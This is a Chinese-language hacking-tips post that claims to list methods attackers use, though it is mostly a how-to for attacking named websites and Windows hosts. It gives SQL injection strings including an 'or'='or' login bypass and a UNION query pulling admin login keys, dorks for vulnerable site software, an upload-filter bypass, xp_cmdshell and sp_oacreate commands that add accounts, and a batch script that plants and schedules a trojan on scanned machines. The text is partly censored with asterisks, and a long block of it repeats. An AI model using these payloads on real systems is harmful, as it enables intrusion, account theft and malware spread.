現在網上的***事件越來越多,***都是通過什麼方法來***我們的呢?下面我們給大家總結了******網絡的五十種方法,讓大家做到有備無患。
1.網寬網絡有限公司製作的網站基本都有注入漏洞 搜索網寬網絡
1.網寬網絡有限公司製作的網站基本都有注入漏洞 搜索網寬網絡
2.搜索欄裏輸入
關鍵字%’and 1=1 and ’%’=’
關鍵字%’and 1=2 and ’%’=’
比較不同處 可以作爲注入的特徵字符
3.登陸框用戶名和密碼輸入’or’=’or’ 漏洞很老但是現在很是遍地都是
4.我們先到[url]www.google.com[/url]底下搜索一下co net mib ver 1.0
密碼帳號都是 ’or’=’or’
5.掛馬代碼
6.[url]http://www.wyyfk.com/24[/url]小時掛QQ工具
7.開啓regedt32的sam的管理員權限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被***過了,然後刪了guest帳號,對方可以用guest帳號使用administraeors的權限,你也可以用這方法留住肉雞,這方法是簡單克隆,
net localgroup administrators還是可以看出guest是管理員來
7.只要敢想,新浪也可*** 注入點
微軟官方網站注入點
[url]http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu[/url]=
8.ms05016***工具用法 mshta.exe test.hta 文件名.後綴名 可以綁上QQ大盜***
9.有sa權限sqlserver數據庫、並且能sql注入支持fso+asp的服務器
sql注入後,如何上傳***,
10.QQ強制聊天代碼
[url]http://wpa.qq.com/msgrd?v=1&uin[/url]=對方的QQ號&sITe=ioshenmue&menu=yes
使用方法:把代碼中的紅色的“********”星號換成你想與其聊天的qq號後復 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他爲好友就能給 他發QQ消息。
11. mybbs論壇cookie欺騙 後臺備份馬
12.軟件instsrv.exe 把.exe文件做成系統服務來啓動 用來肉雞掛QQ等
用法: 安裝: instsrv.exe 服務名稱 路徑
卸載: instsrv.exe 服務名稱 remove
13.以動網爲例數據庫查找dv_log,在上面的查詢的字段名裏選l_content後面的關鍵字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submIT=%cc%ed+%bc%d3 password2=01180017就是他的登陸密碼
14.搜索的技巧 inurl:網址
15.啓航工作室wms 5.0網站程序漏洞
在baidu 搜索powered by: sailingstudio websITe manage system 5.0 (sp1)
利用動畫看[url]http://soft.77169.com/62/20050530/6824.html[/url]
16.很多網站程序(比如華碩中文官方網站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那麼我們要是把文件改成:ating.jpg.asp試試。。由於還是asp結尾,所以***不會變~
17.天意商務系統網上依然有 有漏洞 網站具體的樣式[url]http://www.wzgcc.org/[/url]
工具下載[url]www.hack6.com[/url]
地址欄裏,填上天意商務系統的網址就可以了,注意一定要是主頁面
18.sql注入時工具---internet選項---高級裏找到顯示友好的錯誤信息勾去掉
不能注入時要第一時間想到%5c暴庫
19.這個dbinbd.asp文件插入後門的功能適用於文件名爲.asp的所有access數據庫不是動網論壇也一樣可以使用的,後門隱蔽,幾乎發現不了
工具使用方法動畫和所有文件
[url]http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811[/url]
20.缺少xp_cmdshell時
嘗試恢復exec sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
假如恢復不成功,可以嘗試直接加用戶(針對開3389的)
declare @o int
exec sp_oacreate ’wscript.shell’,@o out
exec sp_oamethod @o,’run’,null,’cmd.exe /c net user ating ating /add’ 再提到管理員
21.批量種植***.bat
for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$Content$nbsp;複製***到掃描的計算機當中
for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行***的時間
掃描地址.txt裏每個主機名一行 用\\開頭
22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址[url]www.hack6.com[/url]
23.dv7.1用還原數據功能 還原asa***
24.凡人網絡購物系統v6.0 可以%5c暴庫
25.ipb2.0.2漏洞 構造語句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基裏找 ipb<= 2.0.3論壇注入工具 [url]www.hack6.com[/url]有下載
在baidu 搜索powered by: sailingstudio websITe manage system 5.0 (sp1)
利用動畫看[url]http://soft.77169.com/62/20050530/6824.html[/url]
16.很多網站程序(比如華碩中文官方網站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那麼我們要是把文件改成:ating.jpg.asp試試。。由於還是asp結尾,所以***不會變~
17.天意商務系統網上依然有 有漏洞 網站具體的樣式[url]http://www.wzgcc.org/[/url]
工具下載[url]www.hack6.com[/url]
地址欄裏,填上天意商務系統的網址就可以了,注意一定要是主頁面
18.sql注入時工具---internet選項---高級裏找到顯示友好的錯誤信息勾去掉
不能注入時要第一時間想到%5c暴庫
19.這個dbinbd.asp文件插入後門的功能適用於文件名爲.asp的所有access數據庫不是動網論壇也一樣可以使用的,後門隱蔽,幾乎發現不了
工具使用方法動畫和所有文件
[url]http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811[/url]
20.缺少xp_cmdshell時
嘗試恢復exec sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
假如恢復不成功,可以嘗試直接加用戶(針對開3389的)
declare @o int
exec sp_oacreate ’wscript.shell’,@o out
exec sp_oamethod @o,’run’,null,’cmd.exe /c net user ating ating /add’ 再提到管理員
21.批量種植***.bat
for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$Content$nbsp;複製***到掃描的計算機當中
for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行***的時間
掃描地址.txt裏每個主機名一行 用\\開頭
22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址[url]www.hack6.com[/url]
23.dv7.1用還原數據功能 還原asa***
24.凡人網絡購物系統v6.0 可以%5c暴庫
25.ipb2.0.2漏洞 構造語句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基裏找 ipb<= 2.0.3論壇注入工具 [url]www.hack6.com[/url]有下載